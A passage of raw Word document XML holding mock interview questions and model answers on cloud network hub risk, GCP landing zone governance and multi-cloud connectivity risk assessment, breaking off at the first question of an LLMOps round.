        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would segment by environment, trust level, data sensitivity, and ownership. Production and non-production should have separate projects, subnets, firewall policies, and access paths. Shared services should expose only required ports, and third-party connectivity should be isolated with strict routing, firewalling, logging, and contractual controls. Segmentation should be tested, not just documented.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. What monitoring, logging, and KRIs would you define for network hub risk?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Network Hub Scope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would enable VPC Flow Logs, firewall logs, Cloud Router logs, DNS logs where appropriate, VPN/Interconnect metrics, NAT metrics, and alerts for route, firewall, DNS, and connectivity changes. KRIs could include open admin ports, public IP usage, firewall rules without owners, route changes, VPN tunnel instability, DNS failures, overlapping CIDRs, and unauthorized connectivity exceptions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. How would you perform a risk assessment before onboarding a new spoke project or VPC into the hub?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Network Hub Scope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would review business purpose, data sensitivity, environment, CIDR ranges, routing needs, DNS needs, firewall requirements, IAM ownership, logging, internet egress, third-party dependencies, and compliance requirements. I would check for overlapping IPs, unintended access to other spokes, required controls, evidence of approvals, and rollback plans before connecting the spoke to the hub.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 41 - GCP Landing Zone Risk and Governance Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. What is a GCP landing zone, and why is it important for enterprise cloud adoption?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Landing Zone</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A GCP landing zone is a pre-designed cloud foundation that defines organization structure, projects, networking, identity, security controls, logging, billing, and governance. It is important because it gives teams a secure and repeatable way to build in the cloud while reducing misconfiguration, inconsistent IAM, audit gaps, and uncontrolled cost.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. What core components would you include in a secure GCP landing zone?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Landing Zone</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would include organization and folder hierarchy, project factory, Shared VPC, hub networking, IAM groups and roles, org policies, centralized logging, Security Command Center, KMS, Secret Manager, billing and budgets, labels, monitoring, CI/CD or Terraform modules, policy-as-code, audit evidence, and documented onboarding and exception workflows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. How would you design the GCP organization, folder, and project hierarchy?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Landing Zone</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would align the hierarchy to governance and operating model. A common structure separates production, non-production, shared services, security, networking, data, and sandbox environments. Projects should have clear ownership, labels, billing mapping, and environment boundaries. Folder-level IAM and org policies should be used carefully so controls are inherited consistently.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Which GCP organization policies would you enforce as part of a secure baseline?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Landing Zone</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would enforce policies such as disabling service account key creation, restricting public IP usage where appropriate, blocking public access to storage, restricting allowed regions, requiring shielded VMs, controlling external sharing, restricting domain identities, and limiting resource locations. The exact policy set should match business, compliance, and application requirements.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. How would you design IAM and access management for a landing zone?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Landing Zone</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would use groups instead of direct user grants, avoid basic roles, separate admin, developer, security, network, and audit roles, use least privilege, enforce MFA through identity provider, prefer service account impersonation, avoid long-lived keys, and review access regularly. Privileged access should be approved, time-bound, logged, and monitored.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. How would you design networking for a GCP landing zone?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Landing Zone</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would use Shared VPC for controlled network ownership, separate host and service projects, define IP ranges carefully, use hub-and-spoke connectivity, private subnets, Cloud NAT or controlled egress, firewall policy, private Google access, DNS forwarding or peering, and hybrid connectivity through VPN or Interconnect. Network changes should follow review and approval workflows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. How would you implement centralized logging, monitoring, and audit evidence in a landing zone?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Landing Zone</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would create aggregated log sinks to a central logging or security project, export critical audit logs to BigQuery or SIEM, enable VPC Flow Logs and firewall logs where needed, define alerting for risky changes, and retain evidence based on compliance requirements. Key events include IAM changes, org policy changes, logging changes, firewall changes, and public exposure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. How would you manage security controls such as SCC, KMS, Secret Manager, vulnerability scanning, and policy-as-code?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Landing Zone</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would enable Security Command Center for posture visibility, use KMS for key management where required, store secrets in Secret Manager, enforce vulnerability scanning for images and workloads, and use policy-as-code in Terraform or CI/CD to block risky changes before deployment. Findings should create owned tickets with severity and SLA.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. How would you handle billing, budgets, labels, cost allocation, and FinOps in a landing zone?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Landing Zone</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would require labels for owner, app, environment, cost center, and data classification; configure budgets and alerts; separate billing views by project or folder; monitor cost anomalies; and define chargeback or showback. FinOps controls should be part of onboarding so cost ownership is clear from day one.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. How would you onboard new application teams or projects into the landing zone safely?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Landing Zone</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would use a project factory or standardized Terraform module that creates projects with baseline IAM, labels, APIs, logging, budgets, network attachment, org policies, and security controls. The onboarding workflow should capture owner, environment, data classification, connectivity needs, approvals, and exception requests before the team starts deploying workloads.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. What are common risks or anti-patterns in GCP landing zone implementation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Landing Zone</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Common anti-patterns include flat project structure, broad Owner access, manual project creation, no labels, inconsistent logging, public buckets, unmanaged service account keys, ad hoc VPC peering, no cost controls, weak exception tracking, and controls that exist on paper but not in CI/CD or Terraform. These create audit gaps and operational risk.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. How would you assess whether an existing GCP landing zone is mature and compliant?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Landing Zone</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would assess organization hierarchy, IAM, org policies, networking, logging, monitoring, billing, security findings, project onboarding, incident readiness, backup, DR, and evidence quality. I would compare current state against a control baseline, sample projects for compliance, review exceptions, identify systemic gaps, and create a prioritized remediation roadmap.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>-------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 42 - Multi-Cloud Network Connectivity Risk Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. How would you design secure network connectivity between GCP, AWS, and Azure?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Multi-Cloud Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would start with business requirements, traffic flows, data sensitivity, latency, compliance, and ownership. Then I would design a hub or transit model using GCP Interconnect or VPN, AWS Direct Connect or Transit Gateway, and Azure ExpressRoute or Virtual WAN. I would enforce segmentation, least-privilege routing, firewall controls, DNS governance, encryption where needed, logging, monitoring, and clear change management.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. What are the main connectivity options for multi-cloud networking, and when would you choose VPN versus dedicated connectivity?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Multi-Cloud Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Main options include site-to-site VPN, dedicated connectivity such as Cloud Interconnect, AWS Direct Connect, Azure ExpressRoute, partner interconnects, SD-WAN, and third-party network appliances. VPN is faster to set up and cheaper for lower-throughput or backup connectivity. Dedicated connectivity is better for predictable latency, higher bandwidth, lower jitter, production workloads, and stronger operational SLAs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. How would you plan IP address ranges to avoid overlap across multiple cloud providers and on-premises networks?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Multi-Cloud Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would create a centralized IP address management plan before connecting networks. Each cloud, region, environment, and business unit should have allocated CIDR ranges with room for growth. I would avoid overlapping private ranges, document ownership, reserve ranges for shared services, and validate new VPC/VNet creation through Terraform or policy checks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. How would you design routing between GCP Cloud Router, AWS Transit Gateway, Azure Virtual WAN, and on-premises networks?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Multi-Cloud Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would define approved route domains, route propagation boundaries, BGP policies, priorities, failover behavior, and summarization. Cloud Router, Transit Gateway, and Virtual WAN should exchange only required routes, not everything by default. I would avoid accidental transitive access, monitor route changes, document traffic paths, and test failover before production dependency.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. What are the security risks of transitive routing in a multi-cloud network?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Multi-Cloud Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Transitive routing can accidentally allow one environment or cloud to reach another through a shared hub. Risks include lateral movement, bypassing inspection points, production to non-production exposure, third-party overreach, and data exfiltration paths. I would control this with segmentation, route filtering, firewall policy, identity-aware access, logging, and explicit approval for each connectivity path.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. How would you design DNS resolution across GCP, AWS, Azure, and on-premises environments?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Multi-Cloud Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would define authoritative zones, forwarding rules, private zones, split-horizon behavior, and ownership. GCP Cloud DNS, AWS Route 53 Resolver, Azure Private DNS, and on-prem DNS should be connected through controlled forwarding paths. I would avoid duplicate zones, document resolution flow, monitor DNS failures, and protect sensitive records with access controls.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. How would you segment production, non-production, shared services, and third-party traffic across multiple clouds?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Multi-Cloud Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would segment by environment, trust level, business unit, data sensitivity, and regulatory boundary. Production should not have broad connectivity to non-production. Shared services should expose only required ports. Third-party connectivity should be isolated with strong firewalling, route controls, logging, contracts, and periodic access review. Segmentation must be tested with connectivity validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. How would you design centralized ingress and egress security controls for multi-cloud workloads?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Multi-Cloud Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would define where internet-facing ingress is allowed, use WAF and load balancer controls, restrict public IPs, and centralize egress through NAT, proxies, firewalls, or inspection appliances where required. Controls should include TLS, allowlists, threat detection, logging, DLP where needed, and clear exception handling so teams do not create unmanaged bypass paths.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. How would you monitor multi-cloud network connectivity, latency, packet loss, route changes, and availability?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Multi-Cloud Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would collect metrics and logs from VPN tunnels, Interconnect, Direct Connect, ExpressRoute, Cloud Router, Transit Gateway, Virtual WAN, firewalls, DNS, NAT, and load balancers. I would monitor latency, packet loss, tunnel status, BGP session state, route changes, dropped traffic, DNS errors, and bandwidth saturation. Alerts should be tied to service impact and ownership.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. How would you troubleshoot an application latency issue between GCP and AWS?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Multi-Cloud Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would confirm scope, affected users, timing, and recent changes. Then I would trace the path across load balancers, VPC routes, VPN or Interconnect, Transit Gateway, firewalls, DNS, and application dependencies. I would compare latency, packet loss, MTU, bandwidth, connection reuse, TLS, and logs from both sides. If needed, I would test from controlled endpoints and roll back recent route or firewall changes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. What disaster recovery and resilience considerations apply to multi-cloud connectivity?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Multi-Cloud Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would design redundant links, diverse regions, backup VPN paths, tested BGP failover, capacity planning, DNS failover, documented runbooks, and monitoring for link degradation. DR plans should define which applications depend on cross-cloud connectivity, what happens during provider outage, expected RTO/RPO, and whether degraded mode is acceptable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. How would you perform a technology risk assessment for a new multi-cloud network connection?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Multi-Cloud Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would review business purpose, data classification, source and destination systems, routes, DNS, authentication, encryption, firewall rules, third-party involvement, compliance requirements, logging, monitoring, ownership, failover, and rollback. I would identify risks such as route leaks, overlapping CIDRs, excessive reachability, weak inspection, and unclear support ownership, then define controls and approval conditions before go-live.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 43 - LLMOps / GenAI Production Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. How would you design a production LLM-backed service on GCP, covering the API gateway, model routing, caching, observability, and cost controls?</w:t>
